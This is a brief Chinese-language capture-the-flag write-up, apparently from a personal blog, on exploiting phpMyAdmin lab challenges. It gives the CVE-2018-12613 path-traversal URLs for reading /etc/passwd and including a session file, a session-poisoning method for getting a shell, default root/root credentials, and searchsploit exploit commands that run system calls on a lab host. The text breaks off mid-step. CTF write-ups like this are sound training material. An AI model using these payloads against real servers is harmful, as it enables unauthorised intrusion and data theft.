BUU-phpmyadmin | wuxie.blog

type

status

date

slug

summary

[PHPMYADMIN]CVE-2018-12613

访问：/?target=sql.php?/../../../../../../../../../etc/passwd

session写入shell的方式进行getshell

客户端从下图获取value，服务端的保存路径：/tmp/sess_{value}

此时，我们只需要执行一句sql，它就会被写入session会话中

最后进行文件包含

访问：/?target=sql.php?/../../../../../../../../../tmp/sess_{value}

升级最新版

版本限制：

4.0.10.16之前4.0.x版本

4.4.15.7之前4.4.x版本

4.6.3之前4.6.x版本（实际上由于该版本要求PHP5.5+，所以无法复现本漏洞）

默认登录口令：root root

searchsploit phpmyadmin |grep "Remote Code Injection"

searchsploit -m php/webapps/40185.py

如果搜索不到就用searchsploit -u进行更新

执行下面的代码即可获取flag：

python3 40185.py -u root --pwd="root" http://node4.buuoj.cn:27072 -c "system('pwd');"

python3 40185.py -u root --pwd="root" http://node4.buuoj.cn:27072 -c "system('env');"

无法获取flag （1.没有上传点 2.未开启日志功能）导致任意文件读取/包含无法利用

构造如下数据包即可：